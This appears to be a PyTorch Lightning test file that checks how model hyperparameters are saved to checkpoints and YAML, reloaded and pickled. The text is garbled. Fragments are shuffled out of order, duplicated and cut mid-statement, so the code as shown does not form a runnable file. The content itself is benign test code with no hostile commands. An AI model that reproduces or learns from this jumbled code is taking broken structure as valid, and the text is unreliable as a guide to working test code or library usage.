a.hparams class A: def test(self): a", "the existence of an arg 'test_arg=14' \"\"\" hparam_type = type(model.hparams)", "cls.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.test_arg == 14 assert isinstance(model2.hparams, hparam_type) if try_overwrite:", "= Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # verify that we can overwrite", "\"\"\" This model has the _auto_collect_arguments() call at the end.", "tests assert model.hparams.test_arg2 == 120 def test_explicit_missing_args_hparams(tmpdir): \"\"\" Tests that", "Container from torch.nn import functional as F from torch.utils.data import", "the Apache License, Version 2.0 (the \"License\"); # you may", "# (AssignHparamsModel, dict(my_arg=42)), # (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), # ]) # def", "== 123 class UnsafeParamModel(BoringModel): def __init__(self, my_path, any_param=123): super().__init__() self.save_hyperparameters()", "class UnsafeParamModel(BoringModel): def __init__(self, my_path, any_param=123): super().__init__() self.save_hyperparameters() def test_model_with_fsspec_as_parameter(tmpdir):", "raw_checkpoint_path = raw_checkpoint_paths[0] raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return raw_checkpoint_path class", "loss}} def configure_optimizers(self): return torch.optim.Adam(self.parameters(), lr=0.02) @pytest.mark.parametrize(\"cls\", [ SimpleNoArgsModel, NoArgsSubClassEvalModel,", "match=\"__init__\\(\\) got an unexpected keyword argument 'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class RuntimeParamChangeModelSaving(BoringModel):", "__init__(self, *args, subclass_arg=1200, **kwargs): 
super().__init__(*args, **kwargs) self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel): pass", "= LocalModel(test_arg=14, test_arg2=90) # run standard test suite raw_checkpoint_path =", "super().__init__(*args, **kwargs) self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A model that has", "# run standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel)", "# limitations under the License. import os import pickle from", "super().__init__() self.save_hyperparameters() class RuntimeParamChangeModelAssign(BoringModel): def __init__(self, **kwargs): super().__init__() self.hparams =", "# save back the checkpoint torch.save(raw_checkpoint, raw_checkpoint_path) # verify that", "the end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst, # LocalVariableModelSuperLast, ]) def test_collect_init_arguments_with_local_vars(cls):", "Trainer( max_epochs=1, default_root_dir=tmpdir, ) train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32)", "179 # verify that model loads correctly model = cls.load_from_checkpoint(raw_checkpoint_path)", "_run_standard_hparams_test(tmpdir, model, LocalModel) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120) # config specific", "\"\"\" Tests that a model can take an object with", "= cls(hparams=Namespace(test_arg=14)) # run standard test suite _run_standard_hparams_test(tmpdir, model, cls)", "= _raw_checkpoint_path(trainer) # model = cls.load_from_checkpoint(raw_checkpoint_path) # assert model.hparams.my_arg ==", "== hparams class NoArgsSubClassEvalModel(EvalModelTemplate): def __init__(self): super().__init__() class SimpleNoArgsModel(LightningModule): def", "load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg') == 123 class UnsafeParamModel(BoringModel): def __init__(self, my_path,", "hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert", "class LocalModel(EvalModelTemplate): def __init__(self, batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters() model = LocalModel()", "# trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) # trainer.fit(model) # #", "== 179 # verify that model loads correctly model =", "dict(arg1=42)), (OtherArgsModel, dict(arg1=3.14, arg2='abc')), ]) def test_single_config_models_fail(tmpdir, cls, config): \"\"\"", "pretend EvalModelTemplate did not call self.save_hyperparameters() self.hparams = hparams class", "class SimpleNoArgsModel(LightningModule): def __init__(self): super().__init__() self.l1 = torch.nn.Linear(28 * 28,", "AssignHparamsModel]) def test_dict_hparams(tmpdir, cls): # init model model = cls(hparams={'test_arg':", "# verify that model loads correctly model = cls.load_from_checkpoint(raw_checkpoint_path) assert", "model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_dict_hparams(tmpdir, cls): # init", "# (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), # ]) # def test_single_config_models(tmpdir, cls, config):", "raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, cls) model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert isinstance(model2.hparams,", "trainer.fit(model) assert 'pickle_me' not in model.hparams def test_hparams_save_yaml(tmpdir): hparams =", "under the License is distributed on an \"AS 
IS\" BASIS,", "assert model2.hparams.batch_size == -17 def test_hparams_pickle(tmpdir): ad = AttributeDict({'key1': 1,", "if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) # verify that the", "pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model that has an attribute", "a = MyModule() _ = a.hparams def test2(self): test_outside() test_outside()", "== 14 assert model2.hparams.mylist[0] == 15.4 def test_explicit_args_hparams(tmpdir): \"\"\" Tests", "class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A model that has unconventional names for", "AssignHparamsModel]) def test_namespace_hparams(tmpdir, cls): # init model model = cls(hparams=Namespace(test_arg=14))", "[ SimpleNoArgsModel, NoArgsSubClassEvalModel, ]) def test_model_nohparams_train_test(tmpdir, cls): \"\"\"Test models that", "= kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test that", "max_epochs=2, overfit_batches=0.5) trainer.fit(model) # make sure the raw checkpoint saved", "saves the arguments passed into the constructor \"\"\" # model", "from fsspec.implementations.local import LocalFileSystem from omegaconf import OmegaConf, Container from", "\"\"\" model = cls(arg1=1, arg2=2) assert 'local_var' not in model.hparams", "assert hparams.get('running_arg') == 123 class UnsafeParamModel(BoringModel): def __init__(self, my_path, any_param=123):", "cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size == 179 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss,", "return {'loss': loss, 'log': {'train_loss': loss}} def configure_optimizers(self): return torch.optim.Adam(self.parameters(),", "import pickle from argparse import Namespace import cloudpickle import pytest", "= UnsafeParamModel(LocalFileSystem(tmpdir)) trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1,", "import torch from fsspec.implementations.local import LocalFileSystem from omegaconf import OmegaConf,", "my_path, any_param=123): super().__init__() self.save_hyperparameters() def test_model_with_fsspec_as_parameter(tmpdir): model = UnsafeParamModel(LocalFileSystem(tmpdir)) trainer", "__init__(self, batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters() model = LocalModel() assert model.hparams.batch_size ==", "# config specific tests assert model.hparams.test_arg2 == 120 def test_implicit_args_hparams(tmpdir):", "test_arg2=120) # config specific tests assert model.hparams.test_arg2 == 120 def", "as F from torch.utils.data import DataLoader from pytorch_lightning import Trainer,", "... # make sure PL modules are always nn.Module a", "__init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg', 'test_arg2') model = LocalModel(test_arg=14, test_arg2=90)", "has the super().__init__() call at the end. 
\"\"\" def __init__(self,", "-> str: raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths = [x for x", "def __init__(self, arg1, arg2, *args, **kwargs): super().__init__(*args, **kwargs) self.argument1 =", "because it cannot be pickled\"): trainer.fit(model) assert 'pickle_me' not in", "test_dict_hparams(tmpdir, cls): # init model model = cls(hparams={'test_arg': 14}) #", "-1))) def training_step(self, batch, batch_nb): x, y = batch loss", "the constructor \"\"\" # model = cls(config) # # #", "= -1 assert model.hparams.running_arg == -1 model.hparams = Namespace(abc=42) assert", "hparams and init in the super class \"\"\" def __init__(self,", "ANY KIND, either express or implied. # See the License", "assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179 # verify that model loads correctly", "the License. # You may obtain a copy of the", "local_var = 1234 self.save_hyperparameters() # this is intentionally here at", "that the checkpoint saved the correct values trainer = Trainer(default_root_dir=tmpdir,", "* 28, 10) def forward(self, x): return torch.relu(self.l1(x.view(x.size(0), -1))) def", "for inheritance: super class takes positional arg, subclass takes varargs.", "# See the License for the specific language governing permissions", "be assigned # assert model.hparams.my_arg == 42 # # #", "test_arg2): super().__init__() self.save_hyperparameters('test_arg') model = LocalModel(test_arg=14, test_arg2=90) # test proper", "in init.\"\"\" model = cls() trainer = Trainer( max_epochs=1, default_root_dir=tmpdir,", "# test_arg2 is not registered in class init return raw_checkpoint_path", "class RuntimeParamChangeModelSaving(BoringModel): def __init__(self, **kwargs): super().__init__() self.save_hyperparameters() class RuntimeParamChangeModelAssign(BoringModel): def", "120 def test_explicit_missing_args_hparams(tmpdir): \"\"\" Tests that a model can take", "**more_kwargs): # intentionally named obj super().__init__(*more_args, **more_kwargs) obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel):", "model loads correctly model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.test_arg == 14", "{'train_loss': loss}} def test_step(self, batch, batch_nb): x, y = batch", "= a.hparams class A: def test(self): a = MyModule() _", "This model has the super().__init__() call at the end. \"\"\"", "arguments are collected and not local variables. 
\"\"\" model =", "EvalModelTemplate, TrialMNIST, BoringModel class SaveHparamsModel(EvalModelTemplate): \"\"\" Tests that a model", "def __init__(self, arg1, arg2): super().__init__() self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\", [ (AnotherArgModel,", "a model can take implicit args and assign \"\"\" #", "class SubSubClassEvalModel(SubClassEvalModel): pass class AggSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs):", "pass class AggSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs): super().__init__(*args, **kwargs)", "ad = AttributeDict({'key1': 1, 'key2': 'abc'}) pkl = pickle.dumps(ad) assert", "Licensed under the Apache License, Version 2.0 (the \"License\"); #", "-17 def test_hparams_pickle(tmpdir): ad = AttributeDict({'key1': 1, 'key2': 'abc'}) pkl", "hparams, no other runtime change allowed\"\"\" model = cls(running_arg=123) assert", "model.hparams.batch_size == 32 model = cls(batch_size=179, **extra_args) assert model.hparams.batch_size ==", "writing, software # distributed under the License is distributed on", "model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert model3.hparams.test_arg == 78 return raw_checkpoint_path", "subclass takes varargs. \"\"\" hparams = dict(test=1) model = SubClassVarArgs(hparams)", "= os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams = load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg') == 123", "= LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120) # config specific tests assert model.hparams.test_arg2 ==", "overwrite whatever we want raw_checkpoint_path = _raw_checkpoint_path(trainer) model = LocalModel.load_from_checkpoint(raw_checkpoint_path,", "*args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() @pytest.mark.parametrize(\"cls\", [ EvalModelTemplate, SubClassEvalModel,", "= [x for x in raw_checkpoint_paths if '.ckpt' in x]", "arg 'test_arg=14' \"\"\" hparam_type = type(model.hparams) # test proper property", "License. import os import pickle from argparse import Namespace import", "self.save_hyperparameters('test_arg') model = LocalModel(test_arg=14, test_arg2=90) # test proper property assignments", "def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test that we save/export only the initial", "\"\"\"Test models that do not tae any argument in init.\"\"\"", "raw_checkpoint_path # ------------------------- # SPECIFIC TESTS # ------------------------- def test_class_nesting():", "permissions and # limitations under the License. import os import", "'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert", "type. 
\"\"\" with pytest.raises(ValueError): _ = cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments']) def", "raw_checkpoint_path @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_namespace_hparams(tmpdir, cls): # init model", "= cloudpickle.dumps(ad) assert ad == pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A", "hparams) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml) ==", "TrialMNIST, BoringModel class SaveHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can", "Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # make sure the raw checkpoint saved", "torch.nn.Module) def test_outside(): a = MyModule() _ = a.hparams class", "class RuntimeParamChangeModelAssign(BoringModel): def __init__(self, **kwargs): super().__init__() self.hparams = kwargs @pytest.mark.parametrize(\"cls\",", "TESTS # ------------------------- def test_class_nesting(): class MyModule(LightningModule): def forward(self): ...", "== 14 # verify that model loads correctly model2 =", "LocalVariableModelSuperLast, ]) def test_collect_init_arguments_with_local_vars(cls): \"\"\" Tests that only the arguments", "Namespace(abc=42) assert model.hparams.abc == 42 trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2,", "# LocalVariableModelSuperLast, ]) def test_collect_init_arguments_with_local_vars(cls): \"\"\" Tests that only the", "that we save/export only the initial hparams, no other runtime", "not in model.hparams # test_arg2 is not registered in class", "has unconventional names for \"self\", \"*args\" and \"**kwargs\". \"\"\" def", "= Trainer( max_epochs=1, default_root_dir=tmpdir, ) train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True),", "governing permissions and # limitations under the License. import os", "the checkpoint saved the correct values # trainer = Trainer(default_root_dir=tmpdir,", "assert model.hparams.batch_size == 179 if isinstance(model, SubClassEvalModel): assert model.hparams.subclass_arg ==", "'overwritten' local_var = 1234 self.save_hyperparameters() # this is intentionally here", "config specific tests assert model.hparams.test_arg2 == 120 def test_implicit_args_hparams(tmpdir): \"\"\"", "42 # # # verify that the checkpoint saved the", "verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) #", "\"\"\" def __init__(self, foo='bar', pickle_me=(lambda x: x + 1), **kwargs):", "_raw_checkpoint_path(trainer) # model = cls.load_from_checkpoint(raw_checkpoint_path) # assert model.hparams.my_arg == 42", "assert load_hparams_from_yaml(path_yaml) == hparams class NoArgsSubClassEvalModel(EvalModelTemplate): def __init__(self): super().__init__() class", "under the License. import os import pickle from argparse import", "== 15 # verify that the checkpoint saved the correct", "past_key): model = EvalModelTemplate() # verify we can train trainer", "a.hparams def test2(self): test_outside() test_outside() A().test2() A().test() class SubClassEvalModel(EvalModelTemplate): any_other_loss", "torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179 #", "\"\"\" Test fail on passing unsupported config type. 
\"\"\" with", "= Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) # trainer.fit(model) # # # verify", "= dict(test=1) model = SubClassVarArgs(hparams) trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model)", "[SaveHparamsModel, AssignHparamsModel]) def test_dict_hparams(tmpdir, cls): # init model model =", "(AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), # ]) # def test_single_config_models(tmpdir, cls, config): #", "\"\"\" def __init__(self, hparams): super().__init__() self.hparams = hparams # -------------------------", "cls(hparams=conf) assert isinstance(model.hparams, Container) # run standard test suite raw_checkpoint_path", "RuntimeParamChangeModelSaving(BoringModel): def __init__(self, **kwargs): super().__init__() self.save_hyperparameters() class RuntimeParamChangeModelAssign(BoringModel): def __init__(self,", "def __init__(obj, *more_args, other_arg=300, **more_kwargs): # intentionally named obj super().__init__(*more_args,", "def test(self): a = MyModule() _ = a.hparams def test2(self):", "os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams))", "*more_args, other_arg=300, **more_kwargs): # intentionally named obj super().__init__(*more_args, **more_kwargs) obj.save_hyperparameters()", "def forward(self): ... # make sure PL modules are always", "]) # def test_single_config_models(tmpdir, cls, config): # \"\"\" Test that", "# # # no matter how you do it, it", "\"\"\" Test for inheritance: super class takes positional arg, subclass", "[ (AnotherArgModel, dict(arg1=42)), (OtherArgsModel, dict(arg1=3.14, arg2='abc')), ]) def test_single_config_models_fail(tmpdir, cls,", "removed from hparams because it cannot be pickled\"): trainer.fit(model) assert", "[x for x in raw_checkpoint_paths if '.ckpt' in x] assert", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "**kwargs): self.argument1 = arg1 # arg2 intentionally not set arg1", "assert ad == pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model that", "super().__init__(batch_size=batch_size) self.save_hyperparameters() model = LocalModel() assert model.hparams.batch_size == 15 #", "matter how you do it, it should be assigned #", "= torch.nn.CrossEntropyLoss() def __init__(self, *args, subclass_arg=1200, **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters()", "model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.test_arg == 14 assert isinstance(model2.hparams, hparam_type)", "model.hparams def test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd'))", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "limitations under the License. 
import os import pickle from argparse", "'log': {'train_loss': loss}} def configure_optimizers(self): return torch.optim.Adam(self.parameters(), lr=0.02) @pytest.mark.parametrize(\"cls\", [", "== 14 assert 'test_arg2' not in model.hparams # test_arg2 is", "max_epochs=2, overfit_batches=0.5) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert", "model = cls(hparams=Namespace(test_arg=14)) # run standard test suite _run_standard_hparams_test(tmpdir, model,", "== 179 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) if isinstance(model,", "correct values # trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) # trainer.fit(model)", "model = cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size == 179 if isinstance(model, AggSubClassEvalModel):", "\"\"\" extra_args = {} if cls is AggSubClassEvalModel: extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss()) elif", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "not in model.hparams def test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here',", "take an object \"\"\" def __init__(self, hparams): super().__init__() self.save_hyperparameters(hparams) class", "# # verify that model loads correctly # raw_checkpoint_path =", "# verify that we can overwrite whatever we want model", "UnsafeParamModel(BoringModel): def __init__(self, my_path, any_param=123): super().__init__() self.save_hyperparameters() def test_model_with_fsspec_as_parameter(tmpdir): model", "isinstance(model.hparams, Container) # run standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir,", "test_hparams_pickle(tmpdir): ad = AttributeDict({'key1': 1, 'key2': 'abc'}) pkl = pickle.dumps(ad)", "try_overwrite: # verify that we can overwrite the property model3", "# verify that the checkpoint saved the correct values #", "(OtherArgsModel, dict(arg1=3.14, arg2='abc')), ]) def test_single_config_models_fail(tmpdir, cls, config): \"\"\" Test", "class AnotherArgModel(EvalModelTemplate): def __init__(self, arg1): super().__init__() self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate): def", "AttributeDict({'key1': 1, 'key2': 'abc'}) pkl = pickle.dumps(ad) assert ad ==", "the model automatically saves the arguments passed into the constructor", "init model model = cls(hparams={'test_arg': 14}) # run standard test", "self.argument1 = arg1 # arg2 intentionally not set arg1 =", "the end class LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\" This model has the _auto_collect_arguments()", "model that has unconventional names for \"self\", \"*args\" and \"**kwargs\".", "super class \"\"\" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def", "hparams = dict(test=1) model = SubClassVarArgs(hparams) trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)", "__init__(self, hparams): super().__init__() self.hparams = hparams # ------------------------- # STANDARD", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters() model", "== 14 # verify that model loads correctly model =", "self.l1 = torch.nn.Linear(28 * 28, 10) def forward(self, x): return", "we can overwrite whatever we want raw_checkpoint_path = 
_raw_checkpoint_path(trainer) model", "correctly model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert model.hparams.test_arg == 14 assert", "model.hparams class SuperClassPositionalArgs(EvalModelTemplate): def __init__(self, hparams): super().__init__() self._hparams = None", "# ------------------------- # SPECIFIC TESTS # ------------------------- def test_class_nesting(): class", "implicit args and assign \"\"\" # define model class LocalModel(EvalModelTemplate):", "hparams # ------------------------- # STANDARD TESTS # ------------------------- def _run_standard_hparams_test(tmpdir,", "\"\"\" hparams = dict(test=1) model = SubClassVarArgs(hparams) trainer = Trainer(default_root_dir=tmpdir,", "test suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_omega_conf_hparams(tmpdir,", "specific language governing permissions and # limitations under the License.", "120 def test_implicit_args_hparams(tmpdir): \"\"\" Tests that a model can take", "UnconventionalArgsEvalModel, DictConfSubClassEvalModel, ]) def test_collect_init_arguments(tmpdir, cls): \"\"\" Test that the", "= SubClassVarArgs(hparams) trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer)", "SuperClassPositionalArgs(EvalModelTemplate): def __init__(self, hparams): super().__init__() self._hparams = None # pretend", "super().__init__() call at the end. \"\"\" def __init__(self, arg1, arg2,", "arg, subclass takes varargs. \"\"\" hparams = dict(test=1) model =", "def test_model_nohparams_train_test(tmpdir, cls): \"\"\"Test models that do not tae any", "*args, **kwargs): super().__init__(*args, **kwargs) def test_args(tmpdir): \"\"\" Test for inheritance:", "loss}} def test_step(self, batch, batch_nb): x, y = batch loss", "model model = cls(hparams={'test_arg': 14}) # run standard test suite", "LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert model.hparams.test_arg == 14 assert 'test_arg2' not in", "property model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert model3.hparams.test_arg == 78 return", "omegaconf import OmegaConf, Container from torch.nn import functional as F", "load_hparams_from_yaml(path_yaml) == hparams class NoArgsSubClassEvalModel(EvalModelTemplate): def __init__(self): super().__init__() class SimpleNoArgsModel(LightningModule):", "# you may not use this file except in compliance", "@pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_namespace_hparams(tmpdir, cls): # init model model", "__init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def test_args(tmpdir): \"\"\" Test for", "__init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters() model = LocalModel(test_arg=14, test_arg2=90) #", "passed into the constructor \"\"\" # model = cls(config) #", "super class takes positional arg, subclass takes varargs. 
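# A minimal cross-check sketch, not part of the original suite: it uses only
# SaveHparamsModel / AssignHparamsModel defined above and asserts that the
# save_hyperparameters(hparams) style and the explicit self.hparams setter
# expose the same value on self.hparams.
def test_hparams_styles_agree_sketch():
    saved = SaveHparamsModel(hparams=dict(test_arg=14))
    assigned = AssignHparamsModel(hparams=dict(test_arg=14))
    assert saved.hparams.test_arg == assigned.hparams.test_arg == 14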
\"\"\" hparams", "assert 'test_arg2' not in model.hparams # test_arg2 is not registered", "assert isinstance(model.hparams.dict_conf, Container) assert model.hparams.dict_conf['my_param'] == 'anything' # verify that", "self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir): model = UnpickleableArgsEvalModel() trainer = Trainer(default_root_dir=tmpdir, max_steps=1)", "can overwrite the property model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert model3.hparams.test_arg", "if isinstance(model, DictConfSubClassEvalModel): assert isinstance(model.hparams.dict_conf, Container) assert model.hparams.dict_conf['my_param'] == 'anything'", "# trainer.fit(model) # # # verify that model loads correctly", "the _auto_collect_arguments() call at the end. \"\"\" def __init__(self, arg1,", "\"\"\" # define model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2):", "batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters() model = LocalModel() assert model.hparams.batch_size == 15", "SubClassVarArgs(hparams) trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) with", "raw_checkpoint_paths raw_checkpoint_path = raw_checkpoint_paths[0] raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return raw_checkpoint_path", "pytorch_lightning import Trainer, LightningModule from pytorch_lightning.core.saving import save_hparams_to_yaml, load_hparams_from_yaml from", "x): return torch.relu(self.l1(x.view(x.size(0), -1))) def training_step(self, batch, batch_nb): x, y", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "model can take regular args and assign \"\"\" # define", "from hparams because it cannot be pickled\"): trainer.fit(model) assert 'pickle_me'", "Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert load_hparams_from_yaml(path_yaml) ==", "\"\"\" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def test_args(tmpdir): \"\"\"", "kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test that we", "def test_model_with_fsspec_as_parameter(tmpdir): model = UnsafeParamModel(LocalFileSystem(tmpdir)) trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2,", "trainer.fit(model) # make sure the raw checkpoint saved the properties", "\"\"\" Tests for the existence of an arg 'test_arg=14' \"\"\"", "of an arg 'test_arg=14' \"\"\" hparam_type = type(model.hparams) # test", "model has the _auto_collect_arguments() call at the end. \"\"\" def", "limit_val_batches=2, limit_test_batches=2, max_epochs=1, ) trainer.fit(model) path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams", "batch_nb): x, y = batch loss = F.cross_entropy(self(x), y) return", "arg1, arg2): super().__init__() self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\", [ (AnotherArgModel, dict(arg1=42)), (OtherArgsModel,", "cannot be pickled. 
\"\"\" def __init__(self, foo='bar', pickle_me=(lambda x: x", "trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in", "saved the correct values # trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5)", "def test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test that the model takes only valid class", "under the Apache License, Version 2.0 (the \"License\"); # you", "tests.base import EvalModelTemplate, TrialMNIST, BoringModel class SaveHparamsModel(EvalModelTemplate): \"\"\" Tests that", "model can take an object \"\"\" def __init__(self, hparams): super().__init__()", "# @pytest.mark.parametrize(\"cls,config\", [ # (SaveHparamsModel, Namespace(my_arg=42)), # (SaveHparamsModel, dict(my_arg=42)), #", "__init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg') model = LocalModel(test_arg=14, test_arg2=90) #", "super().__init__() self.hparams = kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls):", "ad == pickle.loads(pkl) pkl = cloudpickle.dumps(ad) assert ad == pickle.loads(pkl)", "extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model = cls(**extra_args) assert model.hparams.batch_size == 32 model =", "LocalVariableModelSuperLast(EvalModelTemplate): \"\"\" This model has the super().__init__() call at the", "== 42 trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1,", "end class LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\" This model has the _auto_collect_arguments() call", "hparams.get('running_arg') == 123 class UnsafeParamModel(BoringModel): def __init__(self, my_path, any_param=123): super().__init__()", "# init model conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)])) model", "assert model2.hparams.test_arg == 14 assert isinstance(model2.hparams, hparam_type) if try_overwrite: #", "\"\"\" Tests that a model can take regular args and", "pytest.raises(TypeError, match=\"__init__\\(\\) got an unexpected keyword argument 'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class", "arg1, arg2, *args, **kwargs): self.argument1 = arg1 # arg2 intentionally", "raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) raw_checkpoint[past_key] = 